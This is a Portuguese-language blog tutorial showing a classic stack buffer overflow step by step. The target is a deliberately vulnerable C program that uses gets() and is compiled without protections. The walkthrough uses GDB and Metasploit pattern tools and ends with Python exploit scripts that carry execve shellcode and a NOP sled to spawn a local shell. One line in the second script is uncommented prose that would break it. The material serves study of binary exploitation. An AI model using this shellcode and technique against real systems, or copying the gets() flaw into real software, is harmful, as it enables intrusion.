<!DOCTYPE html><html lang="en" mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="day-prompt" content="days ago"><meta name="hour-prompt" content="hours ago"><meta name="minute-prompt" content="minutes ago"><meta name="justnow-prompt" content="just now"><meta name="generator" content="Jekyll v4.3.4" /><meta property="og:title" content="Linux Buffer Overflow - Parte 2 Simples BOF" /><meta name="author" content="Hastur" /><meta property="og:locale" content="en" /><meta name="description" content="Dando continuidade ao estudo sobre buffer overflow, nesta parte exploraremos de fato o primeiro binário." /><meta property="og:description" content="Dando continuidade ao estudo sobre buffer overflow, nesta parte exploraremos de fato o primeiro binário." /><link rel="canonical" href="https://h41stur.github.io/posts/std-bof-2/" /><meta property="og:url" content="https://h41stur.github.io/posts/std-bof-2/" /><meta property="og:site_name" content="H41stur" /><meta property="og:image" content="https://h41stur.github.io/img/std/linbof/bof-logo-2.png" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-09-26T12:00:00-03:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://h41stur.github.io/img/std/linbof/bof-logo-2.png" /><meta property="twitter:title" content="Linux Buffer Overflow - Parte 2 Simples BOF" /><meta name="twitter:site" content="@twitter_username" /><meta name="twitter:creator" content="@Hastur" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Hastur"},"dateModified":"2021-12-13T15:54:13-03:00","datePublished":"2021-09-26T12:00:00-03:00","description":"Dando continuidade ao estudo sobre buffer overflow, nesta parte exploraremos de fato o primeiro binário.","headline":"Linux Buffer Overflow - Parte 2 Simples BOF","image":"https://h41stur.github.io/img/std/linbof/bof-logo-2.png","mainEntityOfPage":{"@type":"WebPage","@id":"https://h41stur.github.io/posts/std-bof-2/"},"url":"https://h41stur.github.io/posts/std-bof-2/"}</script><title>Linux Buffer Overflow - Parte 2 Simples BOF | H41stur</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="H41stur"><meta name="application-name" content="H41stur"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="https://cdn.jsdelivr.net"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column align-items-end" lang="en"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src="https://h41stur.github.io/img/h41stur.jpeg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">H41stur</a></div><div class="site-subtitle font-italic">Strange is the night where black stars rise, and strange moons circle through the skies, but stranger still is lost Carcosa.</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIAS</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARQUIVO</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>SOBRE</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center"> <a href="https://github.com/h41stur" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github-alt"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['leonardor.toledo','gmail.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="https://www.linkedin.com/in/leo-toledo/" aria-label="linkedin" target="_blank" rel="noopener"> <i class="fab fa-linkedin"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>Linux Buffer Overflow - Parte 2 Simples BOF</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Linux Buffer Overflow - Parte 2 Simples BOF</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="semi-bold"> Hastur </span> on <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Sun, Sep 26, 2021, 12:00 PM -0300" >Sep 26, 2021<i class="unloaded">2021-09-26T12:00:00-03:00</i> </span></div><div> <span> Updated <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Mon, Dec 13, 2021, 3:54 PM -0300" >Dec 13, 2021<i class="unloaded">2021-12-13T15:54:13-03:00</i> </span> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1525 words">8 min read</span></div></div><div class="post-content"><p>Dando continuidade ao estudo sobre <strong>buffer overflow</strong>, nesta parte exploraremos de fato o primeiro binário.</p><h2 id="simples-buffer-overflow">Simples Buffer Overflow</h2><p>Para fins de entendimento de como ocorre a corrupção de memória através do <em>buffer overflow</em>, esta primeira parte será realizada com um binário sem nenhuma proteção. Este experimento dará uma visão de como o programa é executado a nível de memória e como é possível executar um shellcode a partir da <em>Stack</em>. Para que o ASLR seja desativado, é preciso executar o comando abaixo:</p><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nv">$ </span><span class="nb">echo </span>0 | <span class="nb">sudo tee</span> /proc/sys/kernel/randomize_va_space 
</pre></table></code></div></div><h3 id="analisando-o-código-fonte">Analisando o código fonte</h3><p>Nem sempre em um cenário real, é possível ter acesso ao código fonte do binário a ser explorado, porém, a fins de estudo, o código fonte do binário está abaixo:</p><p><code class="language-plaintext highlighter-rouge">$ cat prog.c</code></p><div lang="c" class="language-c highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre><td class="rouge-code"><pre><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
</span>
<span class="kt">void</span> <span class="nf">vuln</span><span class="p">(</span><span class="kt">void</span><span class="p">){</span>

        <span class="kt">char</span> <span class="n">c</span><span class="p">[</span><span class="mi">40</span><span class="p">];</span>
        <span class="n">puts</span><span class="p">(</span><span class="s">"Me alimente: "</span><span class="p">);</span>
        <span class="n">gets</span><span class="p">(</span><span class="n">c</span><span class="p">);</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Vc escreveu: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">c</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">){</span>

        <span class="n">vuln</span><span class="p">();</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</pre></table></code></div></div><p>Ao analisar a função <code class="language-plaintext highlighter-rouge">vuln</code>, épossível perceber que ela cria um <em>buffer</em> de <strong>40 bytes</strong>, logo em seguida, a função <code class="language-plaintext highlighter-rouge">gets</code> preenche o <em>buffer</em> criado com o <em>input</em> do usuário. O problema da função <code class="language-plaintext highlighter-rouge">gets</code>, é que ela não faz nenhum tratamento no <em>buffer</em> de entrada para validar seu tamanho, podendo aceitar uma quantidade de <em>bytes</em> muito maior que os 40 setados inicialmente.</p><h3 id="compilando-o-binário">Compilando o binário</h3><p>Para que a exploração ocorra de fato, é necessário a compilação do script em um binário, desativando todas as proteções através do comando abaixo:</p><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nv">$ </span>gcc prog.c <span class="nt">-o</span> prog <span class="nt">-z</span> execstack <span class="nt">-fno-stack-protector</span> <span class="nt">-no-pie</span> <span class="nt">-w</span>
</pre></table></code></div></div><h3 id="enumerando-o-binário">Enumerando o binário</h3><p>Após a compilação, pode-se executar o binário e enumerar seu comportamento:</p><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre><span class="nv">$ </span>./prog 
Me alimente: 
AAAAAAAA
Vc escreveu: AAAAAAAA
</pre></table></code></div></div><p>O programa solicita dados de entrada, e após o envio, retorna a resposta com o <em>buffer</em>. Ao preencher um <em>buffer</em> maior que o esperado, o programa tem o seguinte comportamento:</p><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre><span class="nv">$ </span>./prog                                                                                                      
Me alimente: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Vc escreveu: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAA
zsh: segmentation fault  ./prog
</pre></table></code></div></div><p>O programa respondeu com o erro <code class="language-plaintext highlighter-rouge">"segmentation fault"</code>. Isto ocorre, pois o buffer de entrada foi maior que 40 bytes, sobresccrevendo outros endereços de memória com “A”, fazendo com que o programa não saiba o que executar após a função <code class="language-plaintext highlighter-rouge">vuln</code>.</p><h3 id="debugando-o-binário">Debugando o binário</h3><p>Uma vez constatado a vulnerabilidade de <em>buffer overflow</em>, pode-se utilizar o <code class="language-plaintext highlighter-rouge">Debugger GDB</code> para verificar o comportamento do programa em nível de memória. Para iniciar, é preciso executar o comando abaixo:</p><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nv">$ </span>gdb prog
</pre></table></code></div></div><p>Ao insrir o comando <code class="language-plaintext highlighter-rouge">info functions</code>, todas as funções do programa são listadas, conforme a imagem abaixo:</p><p><img data-proofer-ignore data-src="/img/std/linbof/gdb-1.png" alt="Funções do programa exibidas pelo GDB." /></p><p>Para iniciar o debug, é preciso inserir um <em>breakpoint</em> na função <code class="language-plaintext highlighter-rouge">main</code> através do comando <code class="language-plaintext highlighter-rouge">b main</code>. Em seguida executar o programa no GDB com o comando <code class="language-plaintext highlighter-rouge">run</code>. Após a execução dos comandos, é possível ter o <em>overview</em> dos registradores no início da execução, conforme imagem abaixo:</p><p><img data-proofer-ignore data-src="/img/std/linbof/gdb-2.png" alt="Overview dos registradores no início da execução do programa." /></p><p>Neste ponto da execução, é possível “disassemblar” a função <code class="language-plaintext highlighter-rouge">vuln</code> e verificar os endereços de memória de cada passo com o comando <code class="language-plaintext highlighter-rouge">disas vuln</code>.</p><p><img data-proofer-ignore data-src="/img/std/linbof/gdb-3.png" alt="Disassembly da função vuln" /></p><p>É possível inserir mais um <em>breakpoint</em>, desta vez na chamada <code class="language-plaintext highlighter-rouge">ret</code> da função <code class="language-plaintext highlighter-rouge">vuln</code>, que neste caso está no endereço de memória <code class="language-plaintext highlighter-rouge">0x0000000000401181</code>. Esta chamada retorna para a execução normal do programa após receber o <em>buffer</em> de entrada. Ao setar um <em>breakpoint</em> nesta chamada, é possível analisar os registradores neste exato momento. O <em>breakpoint</em> pode ser setado com o comando <code class="language-plaintext highlighter-rouge">b * 0x0000000000401181</code>.</p><p>Após setar o <em>breakpoint</em>, o programa deve continuar sua execução com o comando <code class="language-plaintext highlighter-rouge">continue</code>.</p><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>gdb-peda<span class="nv">$ </span>b <span class="k">*</span> 0x0000000000401181
Breakpoint 2 at 0x401181
gdb-peda<span class="nv">$ </span><span class="k">continue
</span>Continuing.
Me alimente: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
</pre></table></code></div></div><p>Após preencher o <em>buffer</em> com uma grande quantidade de dados, pode-se continuar a execução com o comando <code class="language-plaintext highlighter-rouge">continue</code>.</p><p><img data-proofer-ignore data-src="/img/std/linbof/gdb-4.png" alt="Execução do programa parada com o erro &quot;SIGSEGV&quot;." /></p><p>Conforme observado, o programa parou com o erro <code class="language-plaintext highlighter-rouge">segmentation fault</code>. Se o proximo comando a ser executado, que se encontra no topo da pilha, for consultado, pode-se verificar que ele está preenchido com <code class="language-plaintext highlighter-rouge">0x4141414141414141</code> (41= A em hexadecimal). O <strong>RSP</strong> pode ser consultado com o comando <code class="language-plaintext highlighter-rouge">x/gx $rsp</code>.</p><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>gdb-peda<span class="nv">$ </span>x/gx <span class="nv">$rsp</span>
0x7fffffffded8: 0x4141414141414141
</pre></table></code></div></div><h3 id="encontrando-o-offset">Encontrando o offset</h3><p>Através da análise do código fonte, é possível identificar que o <em>buffer</em> alocado para a função <code class="language-plaintext highlighter-rouge">vuln</code> é de 40 bytes, porém, devido aos movimentos de registradores, o buffer para se atingir o <strong>RSP</strong> é diferente. Para se descobrir o <em>offset</em> para atingir o endereço desejado, é preciso enviar para o programa um <strong>ciclic pattern</strong>, ou seja, uma cadeia de caracteres que pode ser rastreado para identificarmos o endereço correto. Para criar este <em>ciclic pattern</em>, podemos utilizar o programa <code class="language-plaintext highlighter-rouge">msf-pattern_create</code> da suide <em>Metasploit Framework</em>.</p><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre><span class="nv">$ </span>msf-pattern_create <span class="nt">-l</span> 80
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1
Ac2Ac3Ac4Ac5Ac
</pre></table></code></div></div><p>Este comando cria um <em>ciclic pattern</em> de 80 bytes que pode ser enviado para o programa sendo executado no GDB.</p><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>gdb-peda<span class="nv">$ </span><span class="k">continue
</span>Continuing.
Me alimente: 
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1
Ac2Ac3Ac4Ac5Ac
Vc escreveu: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab
7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac
</pre></table></code></div></div><p>Ao consultar o endereço de <strong>RSP</strong> que causou o erro no programa, é possível encontrar os bytes resultantes.</p><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>gdb-peda<span class="nv">$ </span>x/gx <span class="nv">$rsp</span>
0x7fffffffded8: 0x4130634139624138
</pre></table></code></div></div><p>Com o endereço resultante é possível utilizar o programa <em>msf-pattern_offset</em>, também da suite <em>Metasploit Framework</em>, para consultar o <em>offset</em> resultante do endereço.</p><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="nv">$ </span>msf-pattern_offset <span class="nt">-l</span> 80 <span class="nt">-q</span> 0x4130634139624138
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Exact match at offset 56
</pre></table></code></div></div><p>O <em>offset</em> para atingir <strong>RIP</strong> é de 56 bytes. Pode-se testar este <em>offset</em> ao enviar novamente um <em>buffer</em> para o programa sendo executado no GDB, contndo 56 letras A e 8 letras B. Ao consultar o endereço resultante em <strong>RSP</strong>, ele estará preenchido com o valor <code class="language-plaintext highlighter-rouge">0x4242424242424242</code> (42 = B em hexadecimal).</p><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>gdb-peda<span class="nv">$ </span>x/gx <span class="nv">$rsp</span>
0x7fffffffded8: 0x4242424242424242
</pre></table></code></div></div><p>A partir destas descobertas, é possível ter total controle da execução do binário.</p><h3 id="explorando-o-binário">Explorando o binário</h3><p>Para a exploração do binário, inicialmente será necessário um script em <code class="language-plaintext highlighter-rouge">python 2</code>. O motivo pelo qual será utilizado uma versão antiga da linguagem, se dá pelo fado desta versão imprimir bytes na tela, enquanto o <code class="language-plaintext highlighter-rouge">python 3</code> descontinuou esta função. Porém, para as próximas explorações com <em>bypass</em> das proteções, o Python 3 será utilizado.</p><p>Com o offset correto, é preciso encontrar um “endereço de retorno” válido para o programa, ou seja, após o <em>buffer</em> de 56 bytes, é preciso informar um endereço válido para o programa, de forma que ele não entre em <em>segmentation fault</em>. Este endereço pode ser consultado no próprio GDB, uma vez que o <em>breakpoint</em> foi setado no endereço de retorno da função <code class="language-plaintext highlighter-rouge">vuln</code>, o próximo endereço da <em>Stack</em> pode ser usado. Uma vez que o ASLR foi desabilitado, qualquer endereço de memória permanecerá o mesmo em todas as execuções. O endereço de retorno está no topo da <em>Stack</em> conforme a imagem abaixo:</p><p><img data-proofer-ignore data-src="/img/std/linbof/gdb-5.png" alt="Endereço de retorno para o buffer overflow: 0x7fffffffdf00" /></p><p>Com o endereço em mãos, e com o <em>shell code</em> em linha de bytes criado anteriormente, pode-se criar o seguinte script:</p><p><code class="language-plaintext highlighter-rouge">$ cat exploit.py</code></p><div lang="python" class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre><td class="rouge-code"><pre><span class="c1">#!/usr/bin/python
</span>
<span class="kn">import</span> <span class="n">struct</span>

<span class="n">shell</span> <span class="o">=</span> <span class="sh">"</span><span class="se">\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73</span><span class="s">
</span><span class="se">\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6</span><span class="s">
</span><span class="se">\xb8\x3b\x00\x00\x00\x0f\x05</span><span class="sh">"</span>

<span class="c1">#offset
</span><span class="n">payload</span> <span class="o">=</span> <span class="sh">"</span><span class="s">A</span><span class="sh">"</span> <span class="o">*</span> <span class="mi">56</span>
<span class="c1">#endereco de retorno
</span><span class="n">payload</span> <span class="o">+=</span> <span class="n">struct</span><span class="p">.</span><span class="nf">pack</span><span class="p">(</span><span class="sh">"</span><span class="s">&lt;Q</span><span class="sh">"</span><span class="p">,</span> <span class="mh">0x7fffffffdf00</span><span class="p">)</span>
<span class="c1">#shellcode
</span><span class="n">payload</span> <span class="o">+=</span> <span class="n">shell</span>

<span class="k">print</span> <span class="n">payload</span>
</pre></table></code></div></div><p>Para enviar o exploit via GDB, pode ser utilizado o comando <code class="language-plaintext highlighter-rouge">r &lt; &lt;(python exploit.py)</code>. Ao executar o binário via GDB enviando este script, é possível obter o retorno de que o programa chamou o <code class="language-plaintext highlighter-rouge">/bin/dash</code>, conforme imagem abaixo:</p><p><img data-proofer-ignore data-src="/img/std/linbof/gdb-6.png" alt="Programa chamando /bin/dash via GDB." /></p><p>O exploit está funcional quando é executado por dentro do GDB, pois o endereço de retorno encontrado, considera não so o binário, mas o próŕio GDB. Porém, quando é executado via terminal, existe um decremento não específico dos endereços de memória, como não é possível “adivinhar” este decremento, o script pode ser adaptado com a técnica de <em>NOP Sled</em>.</p><h4 id="nop-sled">NOP Sled</h4><p>O <em>opcode</em> <code class="language-plaintext highlighter-rouge">NOP</code>, representado pelo byte <code class="language-plaintext highlighter-rouge">\x90</code>, é uma instrução Assembly que não faz absolutamente nada. Quando é inserido uma cadeia de NOPs, o programa simplesmente “desliza” sobre eles. Como não é possível descobrir o decremento dos valores de memória, é possível fazer um acréssimo no endereço de retorno seguido de uma cadeia de NOPs. Isto vai fazer com que o endereço de retorno aponte para um lugar bem abaixo da <em>Stack</em>, e logo em seguida o programa vai percorrer os NOPs até o <em>shellcode</em>, fazendo com que o exploit se adapte às diferenças de endereços. O sicript adaptado fica como abaixo:</p><p><code class="language-plaintext highlighter-rouge">$ cat exploit.py</code></p><div lang="python" class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre><td class="rouge-code"><pre><span class="c1">#!/usr/bin/python
</span>
<span class="kn">import</span> <span class="n">struct</span>

<span class="c1">#cadeia de NOPs
</span><span class="n">nops</span> <span class="o">=</span> <span class="sh">"</span><span class="se">\x90</span><span class="sh">"</span> <span class="o">*</span> <span class="mi">200</span>

<span class="n">shell</span> <span class="o">=</span> <span class="sh">"</span><span class="se">\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73</span><span class="s">
</span><span class="se">\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6</span><span class="s">
</span><span class="se">\xb8\x3b\x00\x00\x00\x0f\x05</span><span class="sh">"</span>

<span class="c1">#offset
</span><span class="n">payload</span> <span class="o">=</span> <span class="sh">"</span><span class="s">A</span><span class="sh">"</span> <span class="o">*</span> <span class="mi">56</span>
<span class="n">Endereço</span> <span class="n">de</span> <span class="n">retorno</span> <span class="n">acrescido</span> <span class="n">de</span> <span class="mi">200</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">struct</span><span class="p">.</span><span class="nf">pack</span><span class="p">(</span><span class="sh">"</span><span class="s">&lt;Q</span><span class="sh">"</span><span class="p">,</span> <span class="mh">0x7fffffffdf00</span> <span class="o">+</span> <span class="mi">200</span><span class="p">)</span>
<span class="c1">#cadeia de NOPs
</span><span class="n">payload</span> <span class="o">+=</span> <span class="n">nops</span>
<span class="c1">#shellcode
</span><span class="n">payload</span> <span class="o">+=</span> <span class="n">shell</span>

<span class="k">print</span> <span class="n">payload</span>
</pre></table></code></div></div><p>Ao executar o exploit enviando o payload para o binário, o endereço de retorno é sobrescrito, levando o programa para a cadeia de NOPs, em seguida o <em>shellcode</em> é executado, uma vez que não existem proteções para este binário, é possível obter um <em>command shell</em>.</p><p><img data-proofer-ignore data-src="/img/std/linbof/shell-obtido-1.png" alt="Command Shell obtido via buffer overflow" /></p><p>Com este resultado, foi possível entender o funcionamento básico do processo de exploração de binários via <em>buffer overflow</em> básico. Nas próximas etapas, serão exploradas as técnicas de <em>bypass</em> das proteções comuns.</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/estudos/'>Estudos</a>, <a href='/categories/linux-buffer-overflow/'>Linux Buffer Overflow</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/linux/" class="post-tag no-text-decoration" >Linux</a> <a href="/tags/binary-exploitation/" class="post-tag no-text-decoration" >Binary Exploitation</a> <a href="/tags/buffer-overflow/" class="post-tag no-text-decoration" >Buffer Overflow</a> <a href="/tags/assembly/" class="post-tag no-text-decoration" >Assembly</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Linux Buffer Overflow - Parte 2 Simples BOF - H41stur&url=https://h41stur.github.io/posts/std-bof-2/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Linux Buffer Overflow - Parte 2 Simples BOF - H41stur&u=https://h41stur.github.io/posts/std-bof-2/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Linux Buffer Overflow - Parte 2 Simples BOF - H41stur&url=https://h41stur.github.io/posts/std-bof-2/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <a href="https://www.linkedin.com/sharing/share-offsite/?url=https://h41stur.github.io/posts/std-bof-2/" data-toggle="tooltip" data-placement="top" title="Linkedin" target="_blank" rel="noopener" aria-label="Linkedin"> <i class="fa-fw fab fa-linkedin"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink('', 'Link copied successfully!')" data-toggle="tooltip" data-placement="top" title="Copy link"> </i> </span></div></div></div></div><div> <script src="https://utteranc.es/client.js" repo="h41stur/h41stur.github.io" issue-term="url" theme="photon-dark" crossorigin="anonymous" async> </script></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"> <span>Recent Update</span><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/process-injection/">Process Injection 101</a><li><a href="/posts/evasao-av/">Evasão de Antivírus - Princípios Gerais e Abordagens Específicas</a><li><a href="/posts/paper-heap/">Heap Exploitation P.1</a><li><a href="/posts/shellcoding101/">Shellcoding 101</a><li><a href="/posts/replay-sinal-rf/">Uma Jornada no Hardware Hacking: Criando um Clonador de Sinais RF</a></ul></div><div id="access-tags"> <span>Trending Tags</span><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/linux/">Linux</a> <a class="post-tag" href="/tags/windows/">Windows</a> <a class="post-tag" href="/tags/assembly/">Assembly</a> <a class="post-tag" href="/tags/binary-exploitation/">Binary Exploitation</a> <a class="post-tag" href="/tags/buffer-overflow/">Buffer Overflow</a> <a class="post-tag" href="/tags/web/">Web</a> <a class="post-tag" href="/tags/htb/">HTB</a> <a class="post-tag" href="/tags/vulnserver/">Vulnserver</a> <a class="post-tag" href="/tags/android/">Android</a> <a class="post-tag" href="/tags/kernel/">Kernel</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"> <span class="pl-3 pt-2 mb-2">Contents</span><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" 